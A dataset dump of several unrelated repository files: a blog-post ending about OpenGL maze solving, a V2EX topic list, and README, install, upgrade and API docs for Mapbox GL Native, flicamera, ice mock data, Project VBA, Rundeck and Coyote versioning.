on a CPU over the entire grid (one source, many destinations). If I
had to guess, I'd bet the GPU would come out on top for grids with a
high branching factor (open spaces, etc.) so that its parallelism is
most effectively exploited, but Dijkstra's algorithm would win in all
other cases.
Overall this is more of a proof of concept than a practical
application. It's proof that we can trick OpenGL into solving mazes
for us!
[gol]: /blog/2014/06/10/
[spp]: http://en.wikipedia.org/wiki/Shortest_path_problem
[astar]: http://en.wikipedia.org/wiki/A*_search_algorithm
[rot]: http://ondras.github.io/rot.js/hp/
[bfs]: http://www.redblobgames.com/pathfinding/tower-defense/
[atom]: http://www.opengl.org/wiki/Atomic_Counter
[blend]: /blog/2014/06/21/
| 43.772321 | 79 | 0.76818 | eng_Latn | 0.998493 |
61d1e9414182a75ed63b1b95005753a61137b577 | 625 | md | Markdown | archives/2022-02-03.md | erbanku/v2ex-hot-hub | 746387344a12bbb5265a65511af95f9e3eddd6c1 | [
"MIT"
] | null | null | null | archives/2022-02-03.md | erbanku/v2ex-hot-hub | 746387344a12bbb5265a65511af95f9e3eddd6c1 | [
"MIT"
] | null | null | null | archives/2022-02-03.md | erbanku/v2ex-hot-hub | 746387344a12bbb5265a65511af95f9e3eddd6c1 | [
"MIT"
] | null | null | null | # v2ex 热议话题
`最后更新时间:2022-02-03 11:14:25 +0800`
1. [如何将一个在美国的 500G 的文件传输到国内?](https://www.v2ex.com/t/831705)
1. [日本市场上的品牌电视为什么比国内贵这么多](https://www.v2ex.com/t/831670)
1. [升级完 12.2 后 clash 就无法使用了](https://www.v2ex.com/t/831648)
1. [广东联通申请公网 ip 的神奇经历](https://www.v2ex.com/t/831649)
1. [有没有啥难吃的米(主食),可以限制自己的饭量(不要陈年米),平时饭量较大,有没有啥口味偏差、得难以下咽的米可以推荐,饭难吃就能少吃点。](https://www.v2ex.com/t/831695)
1. [27 寸 4K 接 Mac 显示效果到底怎么样呢?](https://www.v2ex.com/t/831684)
1. [年费大会员记得月初领取 5 个 B 币](https://www.v2ex.com/t/831644)
1. [现在(2022 年 2 月)买 MacBook Air 合适吗?](https://www.v2ex.com/t/831713)
1. [又是谁做的 seo 站出来恶心人](https://www.v2ex.com/t/831664)
| 44.642857 | 103 | 0.7056 | yue_Hant | 0.965131 |
61d2271de5275c3597eecaa9337b869cb8bdb92c | 2,779 | md | Markdown | INSTALL.md | efc-awebb/mapbox-gl-native | f875b08bb857e2773cf644adbfa33d065e0ce59a | [
"BSL-1.0",
"Apache-2.0"
] | null | null | null | INSTALL.md | efc-awebb/mapbox-gl-native | f875b08bb857e2773cf644adbfa33d065e0ce59a | [
"BSL-1.0",
"Apache-2.0"
] | null | null | null | INSTALL.md | efc-awebb/mapbox-gl-native | f875b08bb857e2773cf644adbfa33d065e0ce59a | [
"BSL-1.0",
"Apache-2.0"
] | null | null | null | # Building & Developing Mapbox GL Native from Source
**Just trying to use Mapbox GL Native? You don't need to read this stuff! We
provide [easy-to-install, prebuilt versions of the Mapbox SDKs for iOS and Android
that you can download instantly and get started with fast](https://www.mapbox.com/mobile/).**
Still with us? These are the instructions you'll need to build Mapbox GL Native
from source on a variety of platforms and set up a development environment.
Your journey will start with getting the source code, then installing the
dependencies, and then setting up a development environment, which varies
depending on your operating system and what platform you want to develop for.
## 1: Getting the source
Clone the git repository:
git clone https://github.com/mapbox/mapbox-gl-native.git
cd mapbox-gl-native
## 2: Installing dependencies
These dependencies are required for all operating systems and all platform
targets.
- Modern C++ compiler that supports `-std=c++14`\*
- clang++ 3.5 or later _or_
- g++-4.9 or later
- [CMake](https://cmake.org/) 3.1 or later (for build only)
- [cURL](https://curl.haxx.se) (for build only)
- [Node.js](https://nodejs.org/) 4.2.1 or later (for build only)
- [`pkg-config`](https://wiki.freedesktop.org/www/Software/pkg-config/) (for build only)
**Note**: We partially support C++14 because GCC 4.9 does not fully implement the
final draft of the C++14 standard. More information in [DEVELOPING.md](DEVELOPING.md).
Depending on your operating system and target, you'll need additional
dependencies:
### Additional dependencies for Linux
- [`libcurl`](http://curl.haxx.se/libcurl/) (depends on OpenSSL)
### Additional dependencies for macOS
- Apple Command Line Tools (available at [Apple Developer](https://developer.apple.com/download/more/))
- [Homebrew](http://brew.sh)
- [Cask](http://caskroom.io/) (if building for Android)
- [xcpretty](https://github.com/supermarin/xcpretty) (`gem install xcpretty`)
### Optional dependencies
- [ccache](https://ccache.samba.org) (for build only; improves recompilation performance)
## 3: Setting up a development environment & building
See the relevant SDK documentation for next steps:
* [Mapbox Android SDK](platform/android/)
* [Mapbox iOS SDK](platform/ios/)
* [Mapbox macOS SDK](platform/macos/)
* [Mapbox Qt SDK](platform/qt/)
* [Mapbox GL Native on Linux](platform/linux/)
* [node-mapbox-gl-native](platform/node/)
## 4: Keeping up to date
This repository uses Git submodules, which should be automatically checked out when you first run a `make` command for one of the above platforms. These submodules are not updated automatically and we recommended that you run `git submodule update` after pulling down new commits to this repository.
| 40.275362 | 299 | 0.747031 | eng_Latn | 0.968905 |
61d30921713e4e4cfd5578930a50e862a9aca669 | 2,087 | md | Markdown | README.md | sdss/gfa | bc04ed438658008dbbb9cbb62fe34b30f6f3ed58 | [
"BSD-3-Clause"
] | 9 | 2020-02-14T22:11:40.000Z | 2022-01-25T08:52:01.000Z | README.md | sdss/gfa | bc04ed438658008dbbb9cbb62fe34b30f6f3ed58 | [
"BSD-3-Clause"
] | 6 | 2020-08-02T16:07:16.000Z | 2021-02-18T20:03:39.000Z | README.md | sdss/gfa | bc04ed438658008dbbb9cbb62fe34b30f6f3ed58 | [
"BSD-3-Clause"
] | 6 | 2020-02-21T10:18:11.000Z | 2021-12-22T14:11:17.000Z | # flicamera

[](https://github.com/psf/black)
[](https://sdss-flicamera.readthedocs.io/en/latest/?badge=latest)
[](https://github.com/sdss/flicamera/actions)
[](https://github.com/sdss/flicamera/actions)
[](https://codecov.io/gh/sdss/flicamera)
A library to control Finger Lakes Instrumentation cameras. It provides the SDSS `gfaCamera` and `fvcCamera` actors to control the Guide, Focus and Acquisition cameras and Field View Camera, respectively.
## Installation
In general you should be able to install ``flicamera`` by doing
```console
pip install sdss-flicamera
```
Although `flicamera` should handle all the compilation of the FLI libraries, you may still need to modify your system to give your user access to the FLI USB devices. See [here](https://github.com/sdss/flicamera/blob/master/cextern/README.md) for more details.
To build from source, use
```console
git clone [email protected]:sdss/flicamera
cd flicamera
pip install .[docs]
```
## Development
`flicamera` uses [poetry](http://poetry.eustace.io/) for dependency management and packaging. To work with an editable install it's recommended that you setup `poetry` and install `flicamera` in a virtual environment by doing
```console
poetry install
```
Pip does not support editable installs with PEP-517 yet. That means that running `pip install -e .` will fail because `poetry` doesn't use a `setup.py` file. As a workaround, you can use the `create_setup.py` file to generate a temporary `setup.py` file. To install `flicamera` in editable mode without `poetry`, do
```console
pip install --pre poetry
python create_setup.py
pip install -e .
```
| 46.377778 | 315 | 0.764255 | eng_Latn | 0.745218 |
61d32e42e0585a766ce923c4c289ca75d544caab | 145 | md | Markdown | windows/tools.md | gdsglgf/tutorials | bacb2b901cca778e8d4439a363bca25981074fed | [
"MIT"
] | null | null | null | windows/tools.md | gdsglgf/tutorials | bacb2b901cca778e8d4439a363bca25981074fed | [
"MIT"
] | null | null | null | windows/tools.md | gdsglgf/tutorials | bacb2b901cca778e8d4439a363bca25981074fed | [
"MIT"
] | null | null | null | 磁盘管理 diskmgmt.msc
计算机管理 compmgmt.msc
服务 services.msc
控制面板 control
任务管理器 Taskmgr
远程桌面连接 mstsc
注册表编辑器 regedit
画图 mspaint
截图工具 snippingtool
| 8.055556 | 18 | 0.8 | yue_Hant | 0.122416 |
61d4a9e796b57d11cc7c2e37f62fd25b44887c85 | 14,883 | md | Markdown | docs/en/upgrading/upgrading.md | fossabot/rundeck-1 | b4caaaa41f70d9144158f47a0b71466d776e1ceb | [
"Apache-2.0"
] | null | null | null | docs/en/upgrading/upgrading.md | fossabot/rundeck-1 | b4caaaa41f70d9144158f47a0b71466d776e1ceb | [
"Apache-2.0"
] | null | null | null | docs/en/upgrading/upgrading.md | fossabot/rundeck-1 | b4caaaa41f70d9144158f47a0b71466d776e1ceb | [
"Apache-2.0"
] | null | null | null | % Upgrade Guide
% Greg Schueler
% April 15, 2015
## Upgrading to Rundeck 2.11
(If you are upgrading from a version earlier than 2.10.x, please peruse the rest of this document for any other issues regarding intermediate versions.)
Potentially breaking changes:
**RPM spec:**
The `rundeck` user/group is now created within system UID ranges [#3195](https://github.com/rundeck/rundeck/pull/3195).
**ACLs: Edit Project Configuration/Nodes GUI access level requirements changed:**
Previously: GUI actions "Project > Edit Configuration" and "Project > Edit Nodes" required `admin` project access. Now: only `configure` level access is required.
NOTE: API behavior was always this way, so this change simply aligns the access requirements.
Potential security implications:
* users/roles granted `configure` access to a project will now be able to modify Project Nodes or Configuration via the GUI
* the same users/roles would already have this access if using the API
See: [#3084](https://github.com/rundeck/rundeck/pull/3084)
**ACLs: Job Definition visibility**
A new ACL access level `view` is a subset of the `read` access level for jobs, and does not allow users to view the "Definition" tab of a Job, or download the XML/YAML definitions.
ACLs which allow `read` to Jobs, will work as before. To disallow Job Definition viewing/downloading, you should change your ACLs to only allow `view` access.
**Project Storage Type is now `db` by default:**
If you want to continue using filesystem storage for project config/readme/motd files, you will need to set this in your `rundeck-config.properties` before upgrading:
rundeck.projectsStorageType=filesystem
Upgrading an existing `filesystem` configuration to `db` is automatic, and project configs/readme/motd will be loaded into DB storage at system startup.
To encrypt the DB storage, you will need to [enable encryption for the "Project Configuration" storage layer](http://rundeck.org/docs/plugins-user-guide/bundled-plugins.html#jasypt-encryption-plugin).
## Upgrading to Rundeck 2.8.1 from 2.8.0
### Important Note
If you have previously installed Rundeck 2.8.0, using Mysql or H2 database, the 2.8.1 update
will not work correctly. A DB schema change was required to fix a bug with Postgres and other databases:
(`user` is a reserved word).
If you upgrade from 2.7.x to 2.8.1 (skipping 2.8.0), or install 2.8.1 from scratch, you will *not* encounter this problem.
Use the following methods to update your DB schema for Mysql or H2 if you are upgrading from 2.8.0 to 2.8.1:
#### Mysql upgrade to 2.8.1 from 2.8.0
1. Stop Rundeck
2. Run the following SQL script, to rename the `user` column in the `job_file_record` table to `rduser`.
~~~{.sql}
use rundeck;
alter table job_file_record change column user rduser varchar(255) not null;
~~~
After running this script, you can proceed with the 2.8.1 upgrade.
#### H2 upgrade to 2.8.1 from 2.8.0
For H2, you will need to do the following:
1. Shut down Rundeck.
2. (backup your H2 database contents, see [Backup and Recovery][]).
3. Use the h2 [`RunScript`](http://h2database.com/javadoc/org/h2/tools/RunScript.html) command
to run the following SQL script.
To run the script you will need:
* URL defining the location of your H2 database. This is the same as the `dataSource.url` defined in
your `rundeck-config.properties`.
* For RPM/DEB installs it is `jdbc:h2:file:/var/lib/rundeck/data/rundeckdb`.
* For a Launcher install, it will include your `$RDECK_BASE` path. It can be relative to your current
working directory, such as `jdbc:h2:file:$RDECK_BASE/server/data/grailsdb`.
* File path to the `h2-1.4.x.jar` jar file, which is in the expanded war contents of the Rundeck install.
* For RPM/DEB installs it is `/var/lib/rundeck/exp/webapp/WEB-INF/lib/h2-1.4.193.jar`.
* For launcher install it will under your `$RDECK_BASE`, such as:
`$RDECK_BASE/server/exp/webapp/WEB-INF/lib/h2-1.4.193.jar`
Save this into a file `upgrade-2.8.1.sql`:
~~~ {.sql}
alter table job_file_record rename column user to rduser;
~~~
Run this command:
~~~ {.bash}
H2_JAR_FILE=... #jar file location
H2_URL=... #jdbc URL
java -cp $H2_JAR_FILE org.h2.tools.RunScript \
-url $H2_URL \
-user sa \
-script upgrade-2.8.1.sql
~~~
This command should complete with a 0 exit code (and no output).
You can now upgrade to 2.8.1.
**Error output**
If you see output containing `Column "USER" not found;` then you have already run this script successfully.
If you see output containing `Table "JOB_FILE_RECORD" not found`, then you probably did not have 2.8.0 installed,
you should be able to upgrade from 2.7 without a problem.
[Backup and Recovery]: ../administration/backup-and-recovery.html
## Upgrading to Rundeck 2.8 from earlier versions
### Java 8 is required
Rundeck server now requires Java 8.
## Upgrading to Rundeck 2.7 from 2.6.x
### Java 8 is required
Well, not technically *required* for Rundeck server so much as heavily frowned upon. You should upgrade, consider Java 7 no longer supported. We may switch to actually requiring it soon.
### Default database (H2) upgraded to 1.4.x
The new version uses a different storage format ("mv_store") so switching back to 2.6 after creating a DB with 2.7 may not work.
In-place upgrade with the old storage format do seem to work, however if necessary to keep compatibility with an existing older h2 database, you can update your dataSource.url in rundeck-config.properties to add `;mv_store=false`
dataSource.url = jdbc:h2:file:/path;MVCC=true;mv_store=false
* You can remove `;TRACE_LEVEL_FILE=4` from the dataSource.url in rundeck-config.properties
### CLI tools are gone
We have removed the "rd-*" and "dispatch" and "run" tools from the install, although the "rd-acl" tool is still available.
You should use the new "rd" tool available separately, see <https://rundeck.github.io/rundeck-cli/>.
However, `rd` *does* require Java 8. (See, gotcha.)
### Debian/RPM startup script changes
The file `/etc/rundeck/profile` was modified and will probably not work with your existing install.
(This change was snafu'd into 2.6.10 and reverted in 2.6.11)
If you have customized `/etc/rundeck/profile`, look at the new contents and move your custom env var changes to a file in `/etc/sysconfig/rundeckd`.
### Inline script token expansion changes
(This is another change tha had some hiccups in the 2.6.10 release.)
You must now use `@@` (two at-signs) to produce a literal `@` in an inline script when it might be interpreted as a token, i.e. `@word@` looks like a token, but `@word space@` is ok.
You can globally disable inline script token expansion, see [framework.properties](../administration/configuration-file-reference.html#framework.properties).
### Jetty embedded server was upgraded to 9.0.x
If you are using the default "realm.properties" login mechanism, the default JAAS configuration for file-based authentication will need to be modified to use correct class name in your `jaas-loginmodule.conf`:
* **old value**: `org.eclipse.jetty.plus.jaas.spi.PropertyFileLoginModule`
* Replace with: `org.eclipse.jetty.jaas.spi.PropertyFileLoginModule`
## Upgrading to Rundeck 2.5
### Java 7 required
Java 7 is now required for Rundeck 2.5, and Java 8 can be used. Java 6 will not work.
### Scheduled Jobs with required option default values
A bug in Rundeck previously allowed Jobs to saved with a schedule
even if an Option marked "required" did not have a default value.
The result was that the scheduler would fail to execute the job silently.
In Rundeck 2.5 this is now considered a validation error when creating or importing the job definition,
so any scheduled jobs with required options need to have a default value set.
### rd-project create of existing project
If `rd-project -a create -p projectname` is executed for an existing project, this will now fail.
### Database schema
This release adds some new DB tables but does not alter the schema of other tables.
### Project definitions stored in DB
Rundeck 2.4 and earlier used the filesystem to store Projects and their configuration.
Rundeck 2.5 can now use the DB to store project definition and configuration,
but this is not enabled by default.
If you have projects that exist on the filesystem, when you upgrade to Rundeck 2.5, these projects
and their configuration files can be automatically imported into the DB. This means that
the contents of `project.properties` will be copied to the DB,
using Rundeck's [Storage Facility](../administration/storage-facility.html).
In addition, there is *no encryption by default*, if you want the contents of your project.properties
to be encrypted in the DB, you must configure
[Storage Converter Plugins](../plugins-user-guide/configuring.html#storage-converter-plugins)
to use an encryption plugin. There is now a [Jasypt Encryption Plugin](../plugins-user-guide/storage-plugins.html#jasypt-encryption-converter-plugin) included with Rundeck which can be used.
**Enable project DB storage**:
You can configure Rundeck to use the Database by adding the following to
`rundeck-config.properties` before starting it up:
rundeck.projectsStorageType=db
When importing previously created filesystem projects, the contents of these files are imported to the DB:
* `etc/project.properties`
* `readme.md`
* `motd.md`
In addition, after importing, the `project.properties` file will be renamed to `project.properties.imported`.
If desired, you can switch back to using filesystem projects by doing this:
1. set `rundeck.projectsStorageType=filesystem` in `rundeck-config.properties`
2. rename each `project.properties.imported` file back to `project.properties`
### web.xml changes
The `web.xml` file has changed significantly from 2.4.x to Rundeck 2.5.x.
For this reason, if you have modified your `web.xml` file, located at
`/var/lib/rundeck/exp/webapp/WEB-INF/web.xml`,
for example to change the `<security-role><role-name>user</role-name><security-role>`,
then you may need to back it up, and re-apply the changes you made after upgrading to 2.5.x.
If you receive a "Service Unavailable" error on startup, and the service.log file contains this message:
java.lang.ClassNotFoundException: org.codehaus.groovy.grails.web.sitemesh.GrailsPageFilter
Then that means your web.xml file is out of date. Replace it with the one from 2.5 installation,
then re-apply your changes to `<role-name>`.
## Upgrading to Rundeck 2.1
### Database schema
If you are upgrading from 2.0.x, be sure to perform backups prior to upgrading.
This release adds a new DB table
but does not alter the schema of other tables.
### ACL policy additions
Project access via API has been improved, and new authorizations are now required for project access. See [Adminstration - Access Control Policy](../administration/access-control-policy.html#application-scope-resources-and-actions).
* project access adds `configure`,`delete`,`import`,`export` actions
* `admin` access still allows all actions
Example allowing explicit actions:
context:
application: 'rundeck'
for:
resource:
- equals:
kind: 'project'
allow: [create] # allow creating new projects
project:
- equals:
name: 'myproject'
allow: [read,configure,delete,import,export,admin] # access to 'myproject'
by:
group: admin
The storage facility for uploading public/private keys requires authorization to use. The default `admin.aclpolicy` and `apitoken.aclpolicy` provide this access, but if you have custom policies you may want to allow access to these actions.
* `storage` can allow `create`,`update`,`read`, or `delete`
* you can match on `path` or `name` to narrow the access
The default apitoken aclpolicy file allows this access:
context:
application: 'rundeck'
for:
storage:
- match:
path: '(keys|keys/.*)'
allow: '*' # allow all access to manage stored keys
by:
group: api_token_group
## Upgrading to Rundeck 2.0 from 1.6.x
Rundeck 2.0 has some under-the-hood changes, so please follow this guide when upgrading from Rundeck 1.6.x.
The first step is always to make a backup of all important data for your existing Rundeck installation. Refer to the [Administration - Backup and Recovery](../administration/backup-and-recovery.html) section.
## Clean install
The most direct upgrade method is to use the project export/import method and a clean install of Rundeck 2.0.
Before shutting down your 1.6.x installation, perform **Project Export** for each project you wish to migrate:
1. Select your project
2. Click the *Configure* tab in the header.
3. Click the link under *Export Project Archive* to save it to your local disk.
4. Make a copy of all project files under the projects directory for the project, e.g. `$RDECK_BASE/projects/NAME` (launcher) or `/var/rundeck/projects/NAME` (RPM/Deb). This includes the project.properties configuration as well as resources files.
Perform a *clean* install Rundeck 2.0 (no cheating!).
Then Import the projects you exported:
1. Create a new project, or select an existing project.
2. Click the *gear icon* for the Configure page in the header.
3. Click the *Import Archive* Tab
4. Under *Choose a Rundeck Archive* pick the archive file you downloaded earlier
5. Click *Import*
Finally, restore the project files for the imported project.
## Upgrading JAAS properties file
If you are not doing a clean install, and you want to maintain your JAAS login module configuration, you may have to change your jaas.conf file.
The default jaas-loginmodule.conf file included with Rundeck 1.6.x uses the `org.mortbay.jetty.plus.jaas.spi.PropertyFileLoginModule` class. You will have to change your file to specify `org.eclipse.jetty.plus.jaas.spi.PropertyFileLoginModule` ("org.eclipse").
Modify the `$RDECK_BASE/server/config/jaas-loginmodule.conf` (launcher install) or `/etc/rundeck/jaas-loginmodule.conf` (RPM/Deb install).
## Upgrading an existing H2 Database
If you want to migrate your existing H2 Database, you will have to download an additional jar file to enable upgrading to the newer H2 version used in Rundeck 2.0.
Download the `h2mig_pagestore_addon.jar` file linked on this page:
* [H2 Database Upgrade](http://www.h2database.com/html/advanced.html#database_upgrade)
* Direct link: <http://h2database.com/h2mig_pagestore_addon.jar>
Copy the file to `$RDECK_BASE/server/lib` (launcher jar) or `/var/lib/rundeck/bootstrap` (RPM/Deb install).
## Upgrading an existing Mysql or other Database
Rundeck 2.0 will add some columns to the existing tables, but should allow in-place migration of the mysql database.
However, make sure you take appropriate backups of your data prior to upgrading.
| 42.28125 | 261 | 0.753813 | eng_Latn | 0.990423 |
61d4af2e7c8332feac7878b1719aeff194084de4 | 2,386 | md | Markdown | docs/framework/unmanaged-api/debugging/icordebugprocess6-getexportstepinfo-method.md | yunuskorkmaz/docs.tr-tr | e73dea6e171ca23e56c399c55e586a61d5814601 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/unmanaged-api/debugging/icordebugprocess6-getexportstepinfo-method.md | yunuskorkmaz/docs.tr-tr | e73dea6e171ca23e56c399c55e586a61d5814601 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/unmanaged-api/debugging/icordebugprocess6-getexportstepinfo-method.md | yunuskorkmaz/docs.tr-tr | e73dea6e171ca23e56c399c55e586a61d5814601 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
description: 'Şu konuda daha fazla bilgi edinin: ICorDebugProcess6:: GetExportStepInfo yöntemi'
title: ICorDebugProcess6::GetExportStepInfo Metodu
ms.date: 03/30/2017
ms.assetid: a927e0ac-f110-426d-bbec-9377a29c8f17
ms.openlocfilehash: e14b5e66d90fb2ece91991b3634fc2ad86fac895
ms.sourcegitcommit: ddf7edb67715a5b9a45e3dd44536dabc153c1de0
ms.translationtype: MT
ms.contentlocale: tr-TR
ms.lasthandoff: 02/06/2021
ms.locfileid: "99722015"
---
# <a name="icordebugprocess6getexportstepinfo-method"></a>ICorDebugProcess6::GetExportStepInfo Metodu
Yönetilen kodda adım adım yardım için çalışma zamanına aktarılmış işlevler hakkında bilgi sağlar.
## <a name="syntax"></a>Sözdizimi
```cpp
HRESULT GetExportStepInfo(
[in] LPCWSTR pszExportName,
[out] CorDebugCodeInvokeKind* pInvokeKind,
[out] CorDebugCodeInvokePurpose* pInvokePurpose);
```
## <a name="parameters"></a>Parametreler
pszExportName
'ndaki PE dışarı aktarma tablosunda yazıldığı şekilde bir çalışma zamanı dışa aktarma işlevinin adı.
invokeKind
dışı İçe aktarılmış işlevin yönetilen kodu nasıl çağıracağına ilişkin [cordebugcodeınvokekind](cordebugcodeinvokekind-enumeration.md) numaralandırması üyesine yönelik bir işaretçi.
ınvokeamaç
dışı İçe aktarılmış işlevin neden yönetilen kodu çağıradığına ilişkin bir [Cordebugcodeınvokeamaç](cordebugcodeinvokepurpose-enumeration.md) numaralandırması üyesine yönelik bir işaretçi.
## <a name="return-value"></a>Dönüş Değeri
Yöntemi aşağıdaki tabloda listelenen değerleri döndürebilir.
|Döndürülen değer|Açıklama|
|------------------|-----------------|
|`S_OK`|Yöntem çağrısı başarılı oldu.|
|`E_POINTER`|`pInvokeKind` ya `pInvokePurpose` da **null**.|
|Diğer başarısız `HRESULT` değerler.|Uygun şekilde.|
## <a name="remarks"></a>Açıklamalar
> [!NOTE]
> Bu yöntem yalnızca .NET Native kullanılabilir.
## <a name="requirements"></a>Gereksinimler
**Platformlar:** Bkz. [sistem gereksinimleri](../../get-started/system-requirements.md).
**Üst bilgi:** CorDebug. IDL, CorDebug. h
**Kitaplık:** Corguid. lib
**.NET Framework sürümleri:**[!INCLUDE[net_46_native](../../../../includes/net-46-native-md.md)]
## <a name="see-also"></a>Ayrıca bkz.
- [ICorDebugProcess6 Arabirimi](icordebugprocess6-interface.md)
- [Hata Ayıklama Arabirimleri](debugging-interfaces.md)
| 36.151515 | 190 | 0.741827 | tur_Latn | 0.975514 |
61d4cd8c172624558cb9eeb78d0955d5cb3d2eb3 | 815 | md | Markdown | sandbox/insight-maven-web/ReadMe.md | rjakubco/fuse | 0ee297c5b84e07adeac6b4fc589305d7143b79f2 | [
"Apache-2.0"
] | 1 | 2019-11-22T13:20:17.000Z | 2019-11-22T13:20:17.000Z | sandbox/insight-maven-web/ReadMe.md | rjakubco/fuse | 0ee297c5b84e07adeac6b4fc589305d7143b79f2 | [
"Apache-2.0"
] | 1 | 2020-02-11T01:52:36.000Z | 2020-02-11T01:52:36.000Z | sandbox/insight-maven-web/ReadMe.md | rjakubco/fuse | 0ee297c5b84e07adeac6b4fc589305d7143b79f2 | [
"Apache-2.0"
] | 6 | 2015-10-23T01:08:22.000Z | 2018-08-31T06:34:56.000Z | Fuse Insight Maven
==================
This project aims to give you insight into your dependencies along with deiferences between versions.
Start by seeing the version dependencies, dependency deltas between product releases
and even generating Legal reports.
To run type
cd insight-maven-web
mvn jetty:run
then open: http://localhost:8080/insight/projects
Note that the example projects are really just URLs; you can make up your own URI of the form
* http://localhost:8080/insight/projects/project/GROUPID/ARTIFACTID/jar//VERSION
for a product information, or for a comparison of 2 versions...
* http://localhost:8080/insight/projects/compare/GROUPID/ARTIFACTID/jar//VERSION1/VERSION2
Note that the /jar// part is really /EXTENSION/CLASSIFIER/. Typically the EXTENSION is "jar" and CLASSIFIER is "" | 33.958333 | 113 | 0.774233 | eng_Latn | 0.980911 |
61d54b598116fb53896ab28be0ce9423eb0aea8c | 1,772 | md | Markdown | docs/guide/advance/mock.md | nieyao/ice | 1b6d90321bb06709ca288a73bd06d6347bf83269 | [
"MIT"
] | 1 | 2021-09-11T04:34:11.000Z | 2021-09-11T04:34:11.000Z | docs/guide/advance/mock.md | sspku-yqLiu/ice | e1701e68a959612ab505fef939cf9ad317ba2059 | [
"MIT"
] | null | null | null | docs/guide/advance/mock.md | sspku-yqLiu/ice | e1701e68a959612ab505fef939cf9ad317ba2059 | [
"MIT"
] | null | null | null | ---
title: 本地 Mock 数据
order: 11
---
在前后端分离的开发中,Mock 数据是前端开发中很重要的一个环节,前端可以不必强依赖后端接口,只需要约定好对应的数据接口,前端可以通过 Mock 模拟数据先行开发,在后端接口开发完成后,只需要切换对应的接口地址即可,可以保证项目的同步开发。
在飞冰中,我们提供了完整的 Mock 方案,支持 CRUD 等操作,只需要在项目目录下新建 mock 文件夹,并配置入口文件 `index.ts` 作为路由表的入口,在启动项目服务时工具会同步的启动 Mock 服务。
## 编写 mock 接口
在项目根目录下新建 `mock/index.ts` 文件,并写入以下示例代码:
```ts
export default {
// 同时支持 GET 和 POST
'/api/users/1': { data: {} },
'/api/foo/bar': { data: {} },
// 支持标准 HTTP
'GET /api/users': { users: [1, 2] },
'DELETE /api/users': { users: [1, 2] },
// 支持参数
'POST /api/users/:id': (req, res) => {
const { id } = req.params;
res.send({ id: id });
},
};
```
启动调试服务后,假设启动的端口是 3333,直接在浏览器里访问 `http://127.0.0.1:3333/api/users` 即可看到接口返回数据。
## 约定规则
默认约定项目 mock 目录下每一个 `(t|j)s` 文件为 mock 服务文件,即需要使用上述规范返回数据接口。
如果存在 mock 服务通用工具脚本和数据脚本,可以将对应的文件存放在 `mock/excludeMock` 目录下,该目录下默认不走 mock 逻辑。
忽略 mock 的文件,可以通过工程配置进行自定义:
```json
{
"mock": {
"exclude": ["**/custom/**", "**/*.ts"]
}
}
```
> 上述规则代表忽略 mock 目录中所有 `custom` 目录下的文件以及所有 ts 类型文件
## 请求数据
```jsx
import { useRequest } from 'ice';
function ListView(props) {
const { data, loading, error, request } = useRequest({
url: '/api/users/1',
method: 'GET',
});
useEffect(() => {
request();
}, []);
console.log(data);
return (
<>
// jsx
</>
);
}
```
## 使用 Mock.js
[Mock.js](https://github.com/nuysoft/Mock) 是一个随机生成 mock 数据的工具库:
```ts
import * as Mock from 'mockjs';
export default {
'GET /api/list': (req, res) => {
const list = Mock.mock({
'list|1-10': [
{
'id|+1': 1,
},
],
});
res.send({
status: 'SUCCESS',
data: {
list,
}
});
},
};
```
完整的语法情参考 [Mock.js 文档](http://mockjs.com/examples.html) 。
| 17.203883 | 120 | 0.575621 | yue_Hant | 0.859598 |
61d55a74e9d248691dc96a4e60e10fb35aaae0f1 | 1,244 | md | Markdown | api/Project.application.removetimelinebar.md | skucab/VBA-Docs | 2912fe0343ddeef19007524ac662d3fcb8c0df09 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-04-08T20:10:22.000Z | 2021-04-08T20:10:22.000Z | api/Project.application.removetimelinebar.md | skucab/VBA-Docs | 2912fe0343ddeef19007524ac662d3fcb8c0df09 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-04-02T13:17:46.000Z | 2019-04-02T13:17:46.000Z | api/Project.application.removetimelinebar.md | skucab/VBA-Docs | 2912fe0343ddeef19007524ac662d3fcb8c0df09 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-09-28T07:45:29.000Z | 2021-09-28T07:45:29.000Z | ---
title: Application.RemoveTimelineBar Method (Project)
keywords: vbapj.chm158
f1_keywords:
- vbapj.chm158
ms.assetid: 8385d889-b81e-5422-a032-c7073fa7c65d
ms.date: 06/08/2017
ms.prod: project-server
localization_priority: Normal
---
# Application.RemoveTimelineBar Method (Project)
Removes a **Timeline** bar from the view. Introduced in Office 2016.
## Syntax
_expression_. `RemoveTimelineBar` _(BarIndex) _
_expression_ A variable that represents a [Application](./Project.Application.md) object.
## Parameters
|Name|Required/Optional|Data type|Description|
|:-----|:-----|:-----|:-----|
| _BarPosition_|Optional|**Integer**|Indicates the timeline bar to remove. If a number isn't specified, the selected bar is removed if applicable. The top bar is 0 and the next is 1, and so on. If a number is not specified, the selected bar is removed if one is selected. The last timeline bar cannot be removed.|
| _TimelineViewName_|Optional|**String**|Specifies the name of a timeline. The name can be the built-in timeline or an existing custom timeline such as "My Timeline". The default value is the name of the active timeline.|
## Return value
**BOOLEAN**
[!include[Support and feedback](~/includes/feedback-boilerplate.md)] | 32.736842 | 313 | 0.752412 | eng_Latn | 0.948273 |
61d60867c10c8a8905affe626f6a3f32dc437259 | 2,820 | md | Markdown | Versioning.md | gitter-badger/coyote-1 | d5695ea9ae221804cc3243507a045cb8803dabc6 | [
"MIT"
] | null | null | null | Versioning.md | gitter-badger/coyote-1 | d5695ea9ae221804cc3243507a045cb8803dabc6 | [
"MIT"
] | null | null | null | Versioning.md | gitter-badger/coyote-1 | d5695ea9ae221804cc3243507a045cb8803dabc6 | [
"MIT"
] | null | null | null | # Guidance on Coyote versioning
#### v1.0.0
The Coyote framework versioning follows [Semantic Versioning 2.0.0](https://semver.org/) and has the pattern of MAJOR.MINOR.PATCH.
1) MAJOR version when you make incompatible API changes,
2) MINOR version when you add functionality in a backwards compatible manner, and
3) PATCH version when you make backwards compatible bug fixes.
We adopt everything listed in [Semantic Versioning 2.0.0](https://semver.org/)
but to summarize the major points here:
**Incrementing the MAJOR version number** should be done when:
* a major new feature is added to the Coyote framework or tools and is showcased by a new tutorial demonstrating this feature
* a breaking change has been made to Coyote API or serialization format, or
tool command line arguments.
**Incrementing the MINOR version number** should be done when:
* new features are added to the Coyote API or tools that are backwards
compatible
**Incrementing the PATCH version number** should be done when
